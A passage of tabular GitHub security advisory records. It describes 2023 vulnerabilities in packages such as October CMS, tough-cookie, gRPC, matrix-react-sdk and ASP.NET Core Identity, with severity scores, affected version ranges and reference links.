{'cwe_ids': ['CWE-1333'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-07-05T22:45:55Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-r47v-rxcg-p28j
|
2023-08-03T16:25:15Z
|
2023-07-26T21:30:19Z
| null |
['CVE-2023-37692']
|
Stored Cross-Site Scripting October CMS
|
An svg file upload vulnerability in October CMS v3.4.4 allows attackers to execute arbitrary code in the context of a browser via a crafted svg file. Attackers must be authenticated as users.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}]
|
[{'package': {'ecosystem': 'Packagist', 'name': 'october/october'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '3.4.4'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-37692'}, {'type': 'PACKAGE', 'url': 'https://github.com/octobercms/october'}, {'type': 'WEB', 'url': 'https://okankurtulus.com.tr/2023/07/24/october-cms-v3-4-4-stored-cross-site-scripting-xss-authenticated/'}]
|
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-07-26T22:40:29Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-p4wr-9wfm-f9jw
|
2023-07-20T14:50:03Z
|
2023-07-12T18:30:38Z
| null |
['CVE-2023-37945']
|
Jenkins SAML Single Sign On(SSO) Plugin missing permission check
|
Jenkins SAML Single Sign On(SSO) Plugin 2.3.0 and earlier does not perform a permission check in an HTTP endpoint.
This allows attackers with Overall/Read permission to download a string representation of the current security realm (Java `Object#toString()`), which potentially includes sensitive information.
SAML Single Sign On(SSO) Plugin 2.3.1 requires Overall/Administer permission to access the affected HTTP endpoint, and only allows downloading a string representation if the current security realm is this plugin’s.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'io.jenkins.plugins:miniorange-saml-sp'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.1'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-37945'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2023-07-12/#SECURITY-3164'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2023/07/12/2'}]
|
{'cwe_ids': ['CWE-862'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-07-12T22:31:01Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-pvrw-g6fx-mcx2
|
2023-07-06T21:46:34Z
|
2023-07-06T19:24:05Z
| null |
['CVE-2020-26302']
|
is_js vulnerable to Regular Expression Denial of Service
|
is.js is a general-purpose check library. Versions 0.9.0 and prior contain one or more regular expressions that are vulnerable to Regular Expression Denial of Service (ReDoS). is.js uses a regex copy-pasted from a gist to validate URLs. Trying to validate a malicious string can cause the regex to loop "forever." This vulnerability was found using a CodeQL query which identifies inefficient regular expressions. is.js has no patch for this issue.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]
|
[{'package': {'ecosystem': 'npm', 'name': 'is_js'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.9.0'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-26302'}, {'type': 'WEB', 'url': 'https://github.com/arasatasaygin/is.js/issues/320'}, {'type': 'PACKAGE', 'url': 'https://github.com/arasatasaygin/is.js'}, {'type': 'ADVISORY', 'url': 'https://securitylab.github.com/advisories/GHSL-2020-295-redos-is.js'}]
|
{'cwe_ids': ['CWE-1333', 'CWE-400'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-07-06T21:46:34Z', 'nvd_published_at': '2022-12-22T21:15:00Z'}
|
1.4.0
|
GHSA-c6v5-pf66-xfq8
|
2023-07-14T21:50:57Z
|
2023-07-14T03:32:33Z
| null |
['CVE-2023-3668']
|
Froxlor vulnerable to Improper Encoding or Escaping of Output
|
Improper Encoding or Escaping of Output in GitHub repository froxlor/froxlor prior to 2.0.21.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'Packagist', 'name': 'froxlor/froxlor'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.0.21'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-3668'}, {'type': 'WEB', 'url': 'https://github.com/froxlor/froxlor/commit/03b5a921ff308eeab21bf9d240f27783c8591965'}, {'type': 'PACKAGE', 'url': 'https://github.com/froxlor/froxlor'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/df8cccf4-a340-440e-a7e0-1b42e757d66e'}]
|
{'cwe_ids': ['CWE-116'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-07-14T21:50:57Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-72xf-g2v4-qvf3
|
2023-07-07T21:39:57Z
|
2023-07-01T06:30:16Z
| null |
['CVE-2023-26136']
|
tough-cookie Prototype Pollution vulnerability
|
Versions of the package tough-cookie before 4.1.3 are vulnerable to Prototype Pollution due to improper handling of Cookies when using CookieJar in `rejectPublicSuffixes=false` mode. This issue arises from the manner in which the objects are initialized.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N'}]
|
[{'package': {'ecosystem': 'npm', 'name': 'tough-cookie'}, 'ecosystem_specific': {'affected_functions': ['tough-cookie.CookieJar.setCookieSync']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.1.3'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-26136'}, {'type': 'WEB', 'url': 'https://github.com/salesforce/tough-cookie/issues/282'}, {'type': 'WEB', 'url': 'https://github.com/salesforce/tough-cookie/commit/12d474791bb856004e858fdb1c47b7608d09cf6e'}, {'type': 'PACKAGE', 'url': 'https://github.com/salesforce/tough-cookie'}, {'type': 'WEB', 'url': 'https://github.com/salesforce/tough-cookie/releases/tag/v4.1.3'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2023/07/msg00010.html'}, {'type': 'WEB', 'url': 'https://security.snyk.io/vuln/SNYK-JS-TOUGHCOOKIE-5672873'}]
|
{'cwe_ids': ['CWE-1321'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-07-07T21:39:57Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-9hxf-ppjv-w6rq
|
2023-07-24T16:55:40Z
|
2023-07-06T21:15:08Z
| null |
['CVE-2023-32732']
|
gRPC connection termination issue
|
gRPC contains a vulnerability whereby a client can cause a termination of connection between a HTTP2 proxy and a gRPC server: a base64 encoding error for `-bin` suffixed headers will result in a disconnection by the gRPC server, but is typically allowed by HTTP2 proxies. We recommend upgrading beyond the commit in https://github.com/grpc/grpc/pull/32309.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'io.grpc:grpc-protobuf'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.53.0'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'grpcio'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.53.0'}]}]}, {'package': {'ecosystem': 'RubyGems', 'name': 'grpc'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.53.0'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-32732'}, {'type': 'WEB', 'url': 'https://github.com/grpc/grpc/pull/32309'}, {'type': 'WEB', 'url': 'https://github.com/grpc/grpc/releases/tag/v1.53.1'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/grpc/CVE-2023-32732.yml'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/37IDNVY5AWVH7JDMM2SDTL24ZPPZJNSY/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VWE44J5FG7THHL7XVEVTNIGEYBNKJBLL/'}]
|
{'cwe_ids': ['CWE-440'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-07-06T23:56:31Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-c9vx-2g7w-rp65
|
2023-07-19T20:04:38Z
|
2023-07-18T16:58:01Z
| null |
['CVE-2023-37259']
|
matrix-react-sdk vulnerable to XSS in Export Chat feature
|
### Description
The Export Chat feature includes certain attacker-controlled elements in the generated document without sufficient escaping, leading to stored XSS.
### Impact
Since the Export Chat feature generates a separate document, an attacker can only inject code run from the `null` origin, restricting the impact.
However, the attacker can still potentially use the XSS to leak message contents. A malicious homeserver is a potential attacker since the affected inputs are controllable server-side.
### Patches
This was patched in matrix-react-sdk 3.76.0.
### Workarounds
None, other than not using the Export Chat feature.
### References
N/A
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:A/AC:L/PR:L/UI:R/S:C/C:H/I:N/A:N'}]
|
[{'package': {'ecosystem': 'npm', 'name': 'matrix-react-sdk'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.32.0'}, {'fixed': '3.76.0'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/matrix-org/matrix-react-sdk/security/advisories/GHSA-c9vx-2g7w-rp65'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-37259'}, {'type': 'WEB', 'url': 'https://github.com/matrix-org/matrix-react-sdk/commit/22fcd34c606f32129ebc967fc21f24fb708a98b8'}, {'type': 'PACKAGE', 'url': 'https://github.com/matrix-org/matrix-react-sdk'}, {'type': 'WEB', 'url': 'https://github.com/matrix-org/matrix-react-sdk/releases/tag/v3.76.0'}]
|
{'cwe_ids': ['CWE-79', 'CWE-80'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-07-18T16:58:01Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-qxh3-jgvh-x55j
|
2023-07-05T22:40:22Z
|
2023-07-05T22:40:22Z
| null |
[]
|
Connect-CMS Privilege Escalation Vulnerability
|
### Impact
There is a Privilege Escalation Vulnerability on the management system of Connect-CMS.
Affercted Version : Connect-CMS 1.7.1, 2.3.1 and earlier
### Patches
version 1.7.2, 2.3.2
### Workarounds
Upgrade Connect-CMS to latest version
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N'}]
|
[{'package': {'ecosystem': 'Packagist', 'name': 'opensource-workshop/connect-cms'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.7.2'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'opensource-workshop/connect-cms'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.3.2'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/opensource-workshop/connect-cms/security/advisories/GHSA-qxh3-jgvh-x55j'}, {'type': 'PACKAGE', 'url': 'https://github.com/opensource-workshop/connect-cms'}]
|
{'cwe_ids': [], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-07-05T22:40:22Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-p83q-99rc-vfmv
|
2023-08-03T19:37:47Z
|
2023-07-28T15:30:23Z
| null |
['CVE-2023-39013']
|
Code injection in Duke
|
Duke v1.2 and below was discovered to contain a code injection vulnerability via the component no.priv.garshol.duke.server.CommonJTimer.init.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'no.priv.garshol.duke:duke'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.2'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-39013'}, {'type': 'WEB', 'url': 'https://github.com/larsga/Duke/issues/273'}, {'type': 'PACKAGE', 'url': 'https://github.com/larsga/Duke'}]
|
{'cwe_ids': ['CWE-74', 'CWE-94'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-07-28T20:56:32Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-25c8-p796-jg6r
|
2023-07-17T10:28:39Z
|
2023-07-11T22:45:20Z
| null |
['CVE-2023-33170']
|
Microsoft Security Advisory CVE-2023-33170: .NET Security Feature Bypass Vulnerability
|
# Microsoft Security Advisory CVE-2023-33170: .NET Security Feature Bypass Vulnerability
## <a name="executive-summary"></a>Executive summary
Microsoft is releasing this security advisory to provide information about a vulnerability in ASP.NET Core 2.1 and above. This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability.
A vulnerability exist in ASP.NET Core applications where account lockout maximum failed attempts may not be immediately updated, allowing an attacker to try more passwords.
## Discussion
Discussion for this issue can be found at https://github.com/dotnet/aspnetcore/issues/49334
### <a name="mitigation-factors"></a>Mitigation factors
Microsoft has not identified any mitigating factors for this vulnerability.
## <a name="affected-software"></a>Affected software
* Any ASP.NET 7.0 application running on .NET 7.0.8 or earlier.
* Any ASP.NET 6.0 application running on .NET 6.0.19 or earlier.
* Any ASP.NET Core 2.1 application consuming the package Microsoft.AspNetCore.Identity version 2.1.31 or earlier.
If your application uses the following package versions, ensure you update to the latest version of .NET.
### <a name="ASP.NET Core 2.1"></a>ASP.NET Core 2.1
Package name | Affected version | Patched version
------------ | ---------------- | -------------------------
[ Microsoft.AspNetCore.Identity](https://www.nuget.org/packages/Microsoft.AspNetCore.Identity/2.1.39) | <=2.1.39 | 2.1.39
### <a name="Microsoft.AspNet.Identity.Owin"></a>Microsoft.AspNet.Identity.Owin
Package name | Affected version | Patched version
------------ | ---------------- | -------------------------
[ Microsoft.AspNet.Identity.Owin](https://www.nuget.org/packages/Microsoft.AspNet.Identity.Owin) | <= 2.2.3 | 2.2.4
### <a name="ASP.NET 6"></a>ASP.NET 6.0
Package name | Affected version | Patched version
------------ | ---------------- | -------------------------
[Microsoft.AspNetCore.App.Runtime.linux-arm](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.linux-arm) | <= 6.0.19 | 6.0.20
[Microsoft.AspNetCore.App.Runtime.linux-arm64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.linux-arm64) | <= 6.0.19 | 6.0.20
[Microsoft.AspNetCore.App.Runtime.linux-musl-arm](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.linux-musl-arm) | <= 6.0.19 | 6.0.20
[Microsoft.AspNetCore.App.Runtime.linux-musl-arm64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.linux-musl-arm64) | <= 6.0.19 | 6.0.20
[Microsoft.AspNetCore.App.Runtime.linux-musl-x64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.linux-musl-x64) | <= 6.0.19 | 6.0.20
[Microsoft.AspNetCore.App.Runtime.linux-x64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.linux-x64) | <= 6.0.19 | 6.0.20
[Microsoft.AspNetCore.App.Runtime.osx-arm64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.osx-arm64) | <= 6.0.19 | 6.0.20
[Microsoft.AspNetCore.App.Runtime.osx-x64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.osx-x64) | <= 6.0.19 | 6.0.20
[Microsoft.AspNetCore.App.Runtime.win-arm](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.win-arm) | <= 6.0.19 | 6.0.20
[Microsoft.AspNetCore.App.Runtime.win-arm64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.win-arm64) | <= 6.0.19 | 6.0.20
[Microsoft.AspNetCore.App.Runtime.win-x64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.win-x64) | <= 6.0.19 | 6.0.20
[Microsoft.AspNetCore.App.Runtime.win-x86](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.win-x86) | <= 6.0.19 | 6.0.20
### <a name="ASP.NET 7"></a>ASP.NET 7.0
Package name | Affected version | Patched version
------------ | ---------------- | -------------------------
[Microsoft.AspNetCore.App.Runtime.linux-arm](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.linux-arm) | <= 7.0.9 | 7.0.9
[Microsoft.AspNetCore.App.Runtime.linux-arm64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.linux-arm64) | <= 7.0.9 | 7.0.9
[Microsoft.AspNetCore.App.Runtime.linux-musl-arm](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.linux-musl-arm) | <= 7.0.9 | 7.0.9
[Microsoft.AspNetCore.App.Runtime.linux-musl-arm64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.linux-musl-arm64) | <= 7.0.9 | 7.0.9
[Microsoft.AspNetCore.App.Runtime.linux-musl-x64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.linux-musl-x64) | <= 7.0.9 | 7.0.9
[Microsoft.AspNetCore.App.Runtime.linux-x64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.linux-x64) | <= 7.0.9 | 7.0.9
[Microsoft.AspNetCore.App.Runtime.osx-arm64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.osx-arm64) | <= 7.0.9 | 7.0.9
[Microsoft.AspNetCore.App.Runtime.osx-x64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.osx-x64) | <= 7.0.9 | 7.0.9
[Microsoft.AspNetCore.App.Runtime.win-arm](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.win-arm) | <= 7.0.9 | 7.0.9
[Microsoft.AspNetCore.App.Runtime.win-arm64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.win-arm64) | <= 7.0.9 | 7.0.9
[Microsoft.AspNetCore.App.Runtime.win-x64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.win-x64) | <= 7.0.9 | 7.0.9
[Microsoft.AspNetCore.App.Runtime.win-x86](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.win-x86) | <= 7.0.9 | 7.0.9
## Advisory FAQ
### <a name="how-affected"></a>How do I know if I am affected?
If you have a runtime or SDK with a version listed, or an affected package listed in [affected software](#affected-software), you're exposed to the vulnerability.
### <a name="how-fix"></a>How do I fix the issue?
* To fix the issue please install the latest version of .NET 6.0 or .NET 7.0. If you have installed one or more .NET SDKs through Visual Studio, Visual Studio will prompt you to update Visual Studio, which will also update your .NET SDKs.
* If you are using one of the affected packages, please update to the patched version listed above.
* If you have .NET 6.0 or greater installed, you can list the versions you have installed by running the `dotnet --info` command. You will see output like the following;
```
.NET Core SDK (reflecting any global.json):
Version: 6.0.300
Commit: 8473146e7d
Runtime Environment:
OS Name: Windows
OS Version: 10.0.18363
OS Platform: Windows
RID: win10-x64
Base Path: C:\Program Files\dotnet\sdk\6.0.300\
Host (useful for support):
Version: 6.0.5
Commit: 8473146e7d
.NET Core SDKs installed:
6.0.300 [C:\Program Files\dotnet\sdk]
.NET Core runtimes installed:
Microsoft.AspNetCore.App 6.0.5 [C:\Program Files\dotnet\shared\Microsoft.AspNetCore.App]
Microsoft.NETCore.App 6.0.5 [C:\Program Files\dotnet\shared\Microsoft.NETCore.App]
Microsoft.WindowsDesktop.App 6.0.5 [C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App]
To install additional .NET Core runtimes or SDKs:
https://aka.ms/dotnet-download
```
* If you're using .NET 7.0, you should download and install Runtime 7.0.7 or SDK 7.0.106 (for Visual Studio 2022 v17.4) from https://dotnet.microsoft.com/download/dotnet-core/7.0.
* If you're using .NET 6.0, you should download and install Runtime 6.0.18 or SDK 6.0.312 (for Visual Studio 2022 v17.2) from https://dotnet.microsoft.com/download/dotnet-core/6.0.
* If you're using ASP.NET Core 2.1 and consuming the Microsoft.AspNetCore.Identity package, update that package to version [2.1.39](https://www.nuget.org/packages/Microsoft.AspNetCore.Identity/2.1.39)
.NET 6.0 and and .NET 7.0 updates are also available from Microsoft Update. To access this either type "Check for updates" in your Windows search, or open Settings, choose Update & Security and then click Check for Updates.
Once you have installed the updated runtime or SDK, restart your apps for the update to take effect.
Additionally, if you've deployed [self-contained applications](https://docs.microsoft.com/dotnet/core/deploying/#self-contained-deployments-scd) targeting any of the impacted versions, these applications are also vulnerable and must be recompiled and redeployed.
## Other Information
### Reporting Security Issues
If you have found a potential security issue in .NET 6.0 or .NET 7.0, please email details to secure@microsoft.com. Reports may qualify for the Microsoft .NET Core & .NET 5 Bounty. Details of the Microsoft .NET Bounty Program including terms and conditions are at <https://aka.ms/corebounty>.
### Support
You can ask questions about this issue on GitHub in the .NET GitHub organization. The main repos are located at https://github.com/dotnet/runtime and https://github.com/dotnet/aspnet/. The Announcements repo (https://github.com/dotnet/Announcements) will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the linked discussion issue.
### Disclaimer
The information provided in this advisory is provided "as is" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
### External Links
[CVE-2023-33170]( https://www.cve.org/CVERecord?id=CVE-2023-33170)
### Revisions
V1.0 (July 11, 2023): Advisory published.
_Version 1.0_
_Last Updated 2023-07-11_
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.AspNetCore.Identity'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.39'}]}]}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.AspNet.Identity.Owin'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.2.4'}]}]}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.AspNetCore.App.Runtime.linux-arm'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.0.20'}]}]}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.AspNetCore.App.Runtime.linux-arm64'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.0.20'}]}]}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.AspNetCore.App.Runtime.linux-musl-arm'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.0.20'}]}]}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.AspNetCore.App.Runtime.linux-musl-arm64'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.0.20'}]}]}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.AspNetCore.App.Runtime.linux-x64'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.0.20'}]}]}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.AspNetCore.App.Runtime.osx-x64'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.0.20'}]}]}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.AspNetCore.App.Runtime.win-arm'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.0.20'}]}]}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.AspNetCore.App.Runtime.win-arm64'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.0.20'}]}]}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.AspNetCore.App.Runtime.win-x64'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.0.20'}]}]}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.AspNetCore.App.Runtime.win-x86'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.0.20'}]}]}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.AspNetCore.App.Runtime.win-x86'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.0.9'}]}]}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.AspNetCore.App.Runtime.win-x64'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.0.9'}]}]}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.AspNetCore.App.Runtime.win-arm64'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.0.9'}]}]}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.AspNetCore.App.Runtime.win-arm'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.0.9'}]}]}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.AspNetCore.App.Runtime.osx-x64'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.0.9'}]}]}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.AspNetCore.App.Runtime.osx-arm64'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.0.9'}]}]}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.AspNetCore.App.Runtime.linux-x64'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.0.9'}]}]}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.AspNetCore.App.Runtime.linux-musl-x64'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.0.9'}]}]}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.AspNetCore.App.Runtime.linux-musl-arm64'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.0.9'}]}]}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.AspNetCore.App.Runtime.linux-musl-arm'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.0.9'}]}]}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.AspNetCore.App.Runtime.linux-arm'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.0.9'}]}]}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.AspNetCore.App.Runtime.linux-arm64'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.0.9'}]}]}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.AspNetCore.App.Runtime.linux-musl-x64'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.0.20'}]}]}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.AspNetCore.App.Runtime.osx-arm64'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.0.20'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/dotnet/aspnetcore/security/advisories/GHSA-25c8-p796-jg6r'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-33170'}, {'type': 'WEB', 'url': 'https://github.com/dotnet/aspnetcore/issues/49334'}, {'type': 'PACKAGE', 'url': 'https://github.com/dotnet/aspnetcore'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EVZVMMCCBBCSCPAW2CRQGOTKIHVFCMRO/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/O5CFOR6ID2HP45E7ZOGQNX76FPIWP7XR/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TLWNIIA2I6YCYVCXYBPBRSZ3UH6KILTG/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Y3VJRGNYJXGPF5LXUG3NL45QPK2UU6PL/'}, {'type': 'WEB', 'url': 